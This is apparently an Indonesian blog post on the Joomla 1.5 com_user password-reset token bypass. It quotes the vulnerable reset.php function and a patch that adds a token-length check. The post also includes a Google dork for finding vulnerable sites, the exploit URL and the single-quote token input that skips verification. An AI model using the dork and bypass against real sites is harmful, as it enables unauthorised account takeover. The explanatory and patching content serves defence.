Dork : "Powered by Joomla 1.5" / U'r mind
Exploit : /index.php?option=com_user&view=reset&layout=confirm
Fixed : /components/com_user/models/reset.php
coding didalam "reset.php"
function confirmReset($token)
{
global $mainframe;
$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));
// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}
// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);
return true;
}
Letak Exploit coding :
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));
Jika coding diatas dimasukan (karakter ‘ ) dimasukan pada Token box, maka query yang terlihat seperti :
SELECT id FROM jos_users WHERE block = 0 AND activation = ''
perhatikan tanda ' ' artinya ketika anda inputkan ' maka akan diloloskan begitu saja tanpa token..
PATCH YOUR SYSTEM :
lalu bagaimana cara melakukan patch?
ok buat lah code seperti dibawah ini :
[ CODING PATCH ]
if(strlen($token) != 32) {
$this->setError(JText::_('DI ISI KATA-KATA SESUAI KEINGINAN ANDA'));
return false;
}
Pasti anda bertanya-tanya dimanakah saya letakkan coding tersebut?
coding tersebut ditaruh di :
global $mainframe;
[ CODING PATCH ]
$db = &JFactory::getDBO();
NOte:
- Google sumbernya
No comments:
Post a Comment